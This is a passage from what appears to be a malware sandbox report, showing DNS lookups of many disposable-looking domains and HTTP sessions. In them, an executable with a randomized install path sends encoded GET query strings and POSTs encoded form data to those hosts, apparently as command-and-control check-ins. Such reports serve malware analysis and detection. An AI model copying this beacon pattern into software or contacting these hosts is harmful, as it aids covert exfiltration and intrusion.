                                                              Dec 9, 2024 09:10:44.872112989 CET53609781.1.1.1192.168.2.4
                                                              Dec 9, 2024 09:11:01.375749111 CET5915353192.168.2.41.1.1.1
                                                              Dec 9, 2024 09:11:02.112854004 CET53591531.1.1.1192.168.2.4
                                                              Dec 9, 2024 09:11:16.660547018 CET6482353192.168.2.41.1.1.1
                                                              Dec 9, 2024 09:11:17.668445110 CET6482353192.168.2.41.1.1.1
                                                              Dec 9, 2024 09:11:18.177155972 CET53648231.1.1.1192.168.2.4
                                                              Dec 9, 2024 09:11:18.177174091 CET53648231.1.1.1192.168.2.4
                                                              Dec 9, 2024 09:11:21.219996929 CET5752853192.168.2.41.1.1.1
                                                              Dec 9, 2024 09:11:21.357841015 CET53575281.1.1.1192.168.2.4
                                                              Dec 9, 2024 09:11:26.374875069 CET6079453192.168.2.41.1.1.1
                                                              Dec 9, 2024 09:11:27.000917912 CET53607941.1.1.1192.168.2.4
                                                              Dec 9, 2024 09:11:41.765623093 CET5165253192.168.2.41.1.1.1
                                                              Dec 9, 2024 09:11:42.310089111 CET53516521.1.1.1192.168.2.4
                                                              Dec 9, 2024 09:11:57.314523935 CET4915453192.168.2.41.1.1.1
                                                              Dec 9, 2024 09:11:57.716090918 CET53491541.1.1.1192.168.2.4
                                                              Dec 9, 2024 09:12:05.831326962 CET5301153192.168.2.41.1.1.1
                                                              Dec 9, 2024 09:12:06.840239048 CET5301153192.168.2.41.1.1.1
                                                              Dec 9, 2024 09:12:07.352596998 CET53530111.1.1.1192.168.2.4
                                                              Dec 9, 2024 09:12:07.352839947 CET53530111.1.1.1192.168.2.4
                                                              Dec 9, 2024 09:12:21.390687943 CET6089553192.168.2.41.1.1.1
                                                              Dec 9, 2024 09:12:22.386885881 CET6089553192.168.2.41.1.1.1
                                                              Dec 9, 2024 09:12:22.449975014 CET53608951.1.1.1192.168.2.4
                                                              Dec 9, 2024 09:12:22.524383068 CET53608951.1.1.1192.168.2.4
                                                              Dec 9, 2024 09:12:37.125910044 CET5763353192.168.2.41.1.1.1
                                                              Dec 9, 2024 09:12:37.519903898 CET53576331.1.1.1192.168.2.4

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 9, 2024 09:10:44.557074070 CET192.168.2.41.1.1.10x9d1dStandard query (0)www.supernutra01.onlineA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:01.375749111 CET192.168.2.41.1.1.10xe90bStandard query (0)www.prestigerugz.infoA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:16.660547018 CET192.168.2.41.1.1.10x5888Standard query (0)www.buckser.infoA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:17.668445110 CET192.168.2.41.1.1.10x5888Standard query (0)www.buckser.infoA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:21.219996929 CET192.168.2.41.1.1.10x6f2fStandard query (0)www.buckser.infoA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:26.374875069 CET192.168.2.41.1.1.10x2fdStandard query (0)www.jijievo.siteA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:41.765623093 CET192.168.2.41.1.1.10xc1c4Standard query (0)www.44ynh.topA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:57.314523935 CET192.168.2.41.1.1.10xc6e9Standard query (0)www.setwayidiomas.onlineA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:12:05.831326962 CET192.168.2.41.1.1.10xa0c9Standard query (0)www.75178.clubA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:12:06.840239048 CET192.168.2.41.1.1.10xa0c9Standard query (0)www.75178.clubA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:12:21.390687943 CET192.168.2.41.1.1.10xcc4fStandard query (0)www.taxitayninh365.siteA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:12:22.386885881 CET192.168.2.41.1.1.10xcc4fStandard query (0)www.taxitayninh365.siteA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:12:37.125910044 CET192.168.2.41.1.1.10xba7dStandard query (0)www.ontherise.topA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 9, 2024 09:10:44.872112989 CET1.1.1.1192.168.2.40x9d1dNo error (0)www.supernutra01.online172.67.220.36A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:10:44.872112989 CET1.1.1.1192.168.2.40x9d1dNo error (0)www.supernutra01.online104.21.24.198A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:02.112854004 CET1.1.1.1192.168.2.40xe90bNo error (0)www.prestigerugz.info217.160.0.113A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:18.177155972 CET1.1.1.1192.168.2.40x5888Name error (3)www.buckser.infononenoneA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:18.177174091 CET1.1.1.1192.168.2.40x5888Name error (3)www.buckser.infononenoneA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:21.357841015 CET1.1.1.1192.168.2.40x6f2fName error (3)www.buckser.infononenoneA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:27.000917912 CET1.1.1.1192.168.2.40x2fdNo error (0)www.jijievo.siteall.wjscdn.comCNAME (Canonical name)IN (0x0001)false
                                                              Dec 9, 2024 09:11:27.000917912 CET1.1.1.1192.168.2.40x2fdNo error (0)all.wjscdn.com154.90.58.209A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:27.000917912 CET1.1.1.1192.168.2.40x2fdNo error (0)all.wjscdn.com154.205.143.51A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:27.000917912 CET1.1.1.1192.168.2.40x2fdNo error (0)all.wjscdn.com154.205.156.26A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:27.000917912 CET1.1.1.1192.168.2.40x2fdNo error (0)all.wjscdn.com154.205.159.116A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:27.000917912 CET1.1.1.1192.168.2.40x2fdNo error (0)all.wjscdn.com38.54.112.227A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:27.000917912 CET1.1.1.1192.168.2.40x2fdNo error (0)all.wjscdn.com154.90.35.240A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:42.310089111 CET1.1.1.1192.168.2.40xc1c4No error (0)www.44ynh.top44ynh.topCNAME (Canonical name)IN (0x0001)false
                                                              Dec 9, 2024 09:11:42.310089111 CET1.1.1.1192.168.2.40xc1c4No error (0)44ynh.top38.181.21.178A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:11:57.716090918 CET1.1.1.1192.168.2.40xc6e9Server failure (2)www.setwayidiomas.onlinenonenoneA (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:12:07.352596998 CET1.1.1.1192.168.2.40xa0c9No error (0)www.75178.clubuaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                              Dec 9, 2024 09:12:07.352596998 CET1.1.1.1192.168.2.40xa0c9No error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                              Dec 9, 2024 09:12:07.352596998 CET1.1.1.1192.168.2.40xa0c9No error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:12:07.352839947 CET1.1.1.1192.168.2.40xa0c9No error (0)www.75178.clubuaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                              Dec 9, 2024 09:12:07.352839947 CET1.1.1.1192.168.2.40xa0c9No error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgtml.huksa.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                                              Dec 9, 2024 09:12:07.352839947 CET1.1.1.1192.168.2.40xa0c9No error (0)gtml.huksa.huhusddfnsuegcdn.com23.167.152.41A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:12:22.449975014 CET1.1.1.1192.168.2.40xcc4fNo error (0)www.taxitayninh365.sitetaxitayninh365.siteCNAME (Canonical name)IN (0x0001)false
                                                              Dec 9, 2024 09:12:22.449975014 CET1.1.1.1192.168.2.40xcc4fNo error (0)taxitayninh365.site103.75.185.22A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:12:22.524383068 CET1.1.1.1192.168.2.40xcc4fNo error (0)www.taxitayninh365.sitetaxitayninh365.siteCNAME (Canonical name)IN (0x0001)false
                                                              Dec 9, 2024 09:12:22.524383068 CET1.1.1.1192.168.2.40xcc4fNo error (0)taxitayninh365.site103.75.185.22A (IP address)IN (0x0001)false
                                                              Dec 9, 2024 09:12:37.519903898 CET1.1.1.1192.168.2.40xba7dNo error (0)www.ontherise.top162.0.213.94A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • www.supernutra01.online
                                                              • www.prestigerugz.info
                                                              • www.jijievo.site
                                                              • www.44ynh.top
                                                              • www.75178.club
                                                              • www.taxitayninh365.site
                                                              • www.ontherise.top

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.449758172.67.220.36805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:10:45.008107901 CET482OUTGET /q3v1/?_PMl3=z6VH1Hp8JH&X25tIdT0=fC5DX2ZaB+U22tqbLO3TDxU7YJzfDko0GDmIeZjVqXUIxO0lfLVpCEprOw8FFlXlAKcfYmOgw3KJO3baxmfc0E1tB/T88Ahd3/Is7XNEE2gmn05mRDUrFrs= HTTP/1.1
                                                              Host: www.supernutra01.online
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Dec 9, 2024 09:10:46.318923950 CET1236INHTTP/1.1 200 OK
                                                              Date: Mon, 09 Dec 2024 08:10:46 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Last-Modified: Tue, 24 Sep 2024 07:18:31 GMT
                                                              Accept-Ranges: bytes
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhfT6OV463WGfV1odylEkzobWu8ZBn1ZWQNd%2FBdlN7yFbWRMJg%2BOl%2FmYOQNoYl%2BZ8AnwYy4zjPzDNKKzAxJ6LUv9A%2F6SVO280znVWieTP%2FTpa%2FW%2B5mBwaE2jut7sTJlOG%2B1Bx09wOu8ubA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8ef385450a367ca6-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1891&min_rtt=1891&rtt_var=945&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=482&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                              Data Raw: 32 64 61 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 46 41 53 54 50 41 4e 45 4c 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 40 69 6d 70 6f 72 74 20 75 72 6c 28 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 [TRUNCATED]
                                                              Data Ascii: 2dae<!DOCTYPE html><html lang="en"><head><title>FASTPANEL</title><meta charset="UTF-8"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><style>@import url('https://fonts.googleapis.com/css?family=Roboto:regular,500&display=swap');::after,
                                                              Dec 9, 2024 09:10:46.319015026 CET224INData Raw: 3a 3a 62 65 66 6f 72 65 2c 61 2c 6c 61 62 65 6c 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 6d 61 69 6e 2c 2e 77 72 61 70 70 65 72 7b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 77 69 6e 64 6f 77
                                                              Data Ascii: ::before,a,label{display:inline-block}.main,.wrapper{flex-direction:column}.window-main,.window-main__item{position:relative}*{padding:0;margin:0;border:0}*,::after,::before{box-sizing:border-box}body,html{height:100%;min-wi
                                                              Dec 9, 2024 09:10:46.319025993 CET1236INData Raw: 64 74 68 3a 33 32 30 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 37 35 72 65 6d 3b 2d 6d 73 2d 74
                                                              Data Ascii: dth:320px}body{color:#fff;line-height:1;font-family:Roboto;font-size:.875rem;-ms-text-size-adjust:100%;-moz-text-size-adjust:100%;-webkit-text-size-adjust:100%;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;background-col
                                                              Dec 9, 2024 09:10:46.319238901 CET1236INData Raw: 6c 61 74 69 76 65 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 37 37 37 37 37 37 37 37 38 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e
                                                              Data Ascii: lative;font-weight:500;line-height:1.2777777778}.window-main__title::before{content:"";position:absolute;bottom:0;left:50%;height:2px;width:8rem;background-color:#15b4fc;-webkit-transform:translateX(-50%);transform:translateX(-50%)}.window-mai
                                                              Dec 9, 2024 09:10:46.319279909 CET1236INData Raw: 77 2d 6d 61 69 6e 5f 5f 69 6e 66 6f 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 35 72 65 6d 7d 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 6c 69 73 74 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 2e 35 36 32 35 72 65 6d 7d 2e 77 69 6e 64 6f 77
                                                              Data Ascii: w-main__info{margin-bottom:1.5rem}.window-main__list{padding-left:.5625rem}.window-main__item{padding-left:.75rem}.window-main__actions{margin-top:1.5rem}}@media (max-width:29.99875em){.window-main .svg-one{top:-330px}.window-main .svg-two{bot
                                                              Dec 9, 2024 09:10:46.319299936 CET1236INData Raw: 65 6d 29 29 7b 2e 77 69 6e 64 6f 77 2d 6d 61 69 6e 7b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 63 61 6c 63 28 31 2e 35 72 65 6d 20 2b 20 32 2e 32 35 2a 28 31 30 30 76 77 20 2d 20 32 30 72 65 6d 29 2f 20 32 35 2e 36 32 35 29 7d 7d 40 73 75 70 70 6f 72
                                                              Data Ascii: em)){.window-main{padding-top:calc(1.5rem + 2.25*(100vw - 20rem)/ 25.625)}}@supports (padding-bottom:clamp(1.5rem ,-0.256097561rem + 8.7804878049vw ,3.75rem)){.window-main{padding-bottom:clamp(1.5rem ,-.256097561rem + 8.7804878049vw ,3.75rem)}
                                                              Dec 9, 2024 09:10:46.319319963 CET1236INData Raw: 7d 7d 40 73 75 70 70 6f 72 74 73 20 6e 6f 74 20 28 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 63 6c 61 6d 70 28 31 2e 35 72 65 6d 20 2c 31 2e 32 30 37 33 31 37 30 37 33 32 72 65 6d 20 2b 20 31 2e 34 36 33 34 31 34 36 33 34 31 76 77 20 2c 31 2e 38
                                                              Data Ascii: }}@supports not (margin-bottom:clamp(1.5rem ,1.2073170732rem + 1.4634146341vw ,1.875rem)){.window-main__info{margin-bottom:calc(1.5rem + .375*(100vw - 20rem)/ 25.625)}}@supports (padding-left:clamp(0.5625rem ,0.4649390244rem + 0.487804878vw ,0
                                                              Dec 9, 2024 09:10:46.320075035 CET1236INData Raw: 61 6c 6c 20 30 2e 34 73 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 45 30 46 31 34 3b 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 33 33 33 41 34 38 3b 7d 0a 09 3c 2f 73 74 79 6c 65 3e
                                                              Data Ascii: all 0.4s; background-color: #0E0F14;}a:hover{border: 2px solid #333A48;}</style></head><body><div class="wrapper"><main class="page"><section class="main"><div class="main__window window-main"><svg class="svg-one" widt
                                                              Dec 9, 2024 09:10:46.320100069 CET1236INData Raw: 37 33 22 20 79 3d 22 30 2e 39 31 34 36 37 33 22 20 77 69 64 74 68 3d 22 36 32 39 2e 36 36 32 22 20 68 65 69 67 68 74 3d 22 38 31 30 2e 35 30 36 22 20 66 69 6c 74 65 72 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 63 6f 6c
                                                              Data Ascii: 73" y="0.914673" width="629.662" height="810.506" filterUnits="userSpaceOnUse" color-interpolation-filters="sRGB"><feFlood flood-opacity="0" result="BackgroundImageFix" /><feBlend mode="normal" in="SourceGraphic" in2="Backgro
                                                              Dec 9, 2024 09:10:46.320111036 CET1236INData Raw: 76 67 3e 0a 0a 09 09 09 09 09 3c 68 31 20 63 6c 61 73 73 3d 22 77 69 6e 64 6f 77 2d 6d 61 69 6e 5f 5f 74 69 74 6c 65 22 3e 57 68 79 20 61 6d 20 49 20 73 65 65 69 6e 67 20 74 68 69 73 20 70 61 67 65 3f 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 64 69 76
                                                              Data Ascii: vg><h1 class="window-main__title">Why am I seeing this page?</h1><div class="window-main__body"><p class="window-main__info">Here are some common issues that cause you to see this page:</p><ul class="window-main__lis
                                                              Dec 9, 2024 09:10:46.327419043 CET1214INData Raw: 5f 32 30 30 31 5f 31 30 29 22 3e 0a 09 09 09 09 09 09 09 3c 70 61 74 68 20 64 3d 22 4d 32 35 39 2e 37 34 33 20 36 33 38 2e 35 35 32 43 33 36 31 2e 39 38 31 20 34 32 38 2e 38 38 38 20 31 35 39 2e 30 35 38 20 34 36 37 2e 30 33 39 20 32 31 38 2e 33
                                                              Data Ascii: _2001_10)"><path d="M259.743 638.552C361.981 428.888 159.058 467.039 218.34 343.567C277.623 220.094 392.275 151.975 474.424 191.418C556.572 230.862 575.108 362.931 515.826 486.404C456.543 609.876 341.891 677.995 259.743 638.552Z" fill=


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.449797217.160.0.113805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:11:02.298285961 CET753OUTPOST /m5si/ HTTP/1.1
                                                              Host: www.prestigerugz.info
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 205
                                                              Origin: http://www.prestigerugz.info
                                                              Referer: http://www.prestigerugz.info/m5si/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2b 35 30 62 56 33 69 4b 49 77 73 5a 38 4e 54 4b 4c 6c 79 53 48 37 37 34 5a 4c 45 45 48 6e 4b 39 4a 31 36 50 50 6a 52 53 37 66 57 65 6c 7a 52 6c 48 58 49 54 70 71 37 69 72 6a 57 51 44 71 7a 4c 4e 49 36 61 6e 61 49 73 6c 6b 2f 37 38 7a 2f 50 74 76 54 79 79 63 52 67 70 6b 30 4b 73 55 35 59 38 78 75 36 7a 64 77 77 4c 76 6e 43 6d 34 32 79 63 4f 35 74 76 41 48 76 30 7a 71 66 32 69 33 37 63 75 31 39 48 72 55 43 4b 42 4f 4b 2b 69 61 35 7a 6d 44 67 7a 44 61 2f 43 64 75 4d 77 54 70 51 53 74 73 4d 76 70 62 67 4c 59 75 58 71 45 66 46 47 57 77 46 56 77 3d 3d
                                                              Data Ascii: X25tIdT0=TowXiW7yiZaI+50bV3iKIwsZ8NTKLlySH774ZLEEHnK9J16PPjRS7fWelzRlHXITpq7irjWQDqzLNI6anaIslk/78z/PtvTyycRgpk0KsU5Y8xu6zdwwLvnCm42ycO5tvAHv0zqf2i37cu19HrUCKBOK+ia5zmDgzDa/CduMwTpQStsMvpbgLYuXqEfFGWwFVw==
                                                              Dec 9, 2024 09:11:03.518059969 CET780INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Date: Mon, 09 Dec 2024 08:11:03 GMT
                                                              Server: Apache
                                                              X-Frame-Options: deny
                                                              Content-Encoding: gzip
                                                              Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 [TRUNCATED]
                                                              Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.449804217.160.0.113805592C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 9, 2024 09:11:04.963036060 CET773OUTPOST /m5si/ HTTP/1.1
                                                              Host: www.prestigerugz.info
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Connection: close
                                                              Cache-Control: no-cache
                                                              Content-Length: 225
                                                              Origin: http://www.prestigerugz.info
                                                              Referer: http://www.prestigerugz.info/m5si/
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0
                                                              Data Raw: 58 32 35 74 49 64 54 30 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2f 61 38 62 53 68 71 4b 4f 51 73 61 7a 74 54 4b 41 46 79 57 48 37 33 34 5a 4b 78 63 48 30 75 39 4a 56 4b 50 4f 67 4a 53 79 50 57 65 39 6a 52 67 4b 33 49 63 70 71 33 45 72 68 43 51 44 71 58 4c 4e 4a 71 61 6e 74 63 76 2f 55 2f 35 77 54 2f 4e 31 50 54 79 79 63 52 67 70 6b 77 77 73 55 68 59 38 69 6d 36 7a 38 77 7a 49 76 6e 42 33 34 32 79 4c 2b 35 70 76 41 48 64 30 79 6d 6c 32 67 2f 37 63 76 46 39 43 71 55 42 54 78 4f 41 36 69 62 6c 34 6c 65 4b 7a 43 76 33 4e 64 62 6a 2b 51 42 4e 58 72 68 57 2b 59 36 33 5a 59 4b 6b 33 44 57 78 4c 56 4e 4d 4f 39 6c 54 43 37 62 59 6f 74 6c 36 43 54 50 32 31 46 32 69 4e 78 67 3d
                                                              Data Ascii: X25tIdT0=TowXiW7yiZaI/a8bShqKOQsaztTKAFyWH734ZKxcH0u9JVKPOgJSyPWe9jRgK3Icpq3ErhCQDqXLNJqantcv/U/5wT/N1PTyycRgpkwwsUhY8im6z8wzIvnB342yL+5pvAHd0yml2g/7cvF9CqUBTxOA6ibl4leKzCv3Ndbj+QBNXrhW+Y63ZYKk3DWxLVNMO9lTC7bYotl6CTP21F2iNxg=
                                                              Dec 9, 2024 09:11:06.236061096 CET780INHTTP/1.1 404 Not Found
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Date: Mon, 09 Dec 2024 08:11:06 GMT
                                                              Server: Apache
                                                              X-Frame-Options: deny
                                                              Content-Encoding: gzip
                                                              Data Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 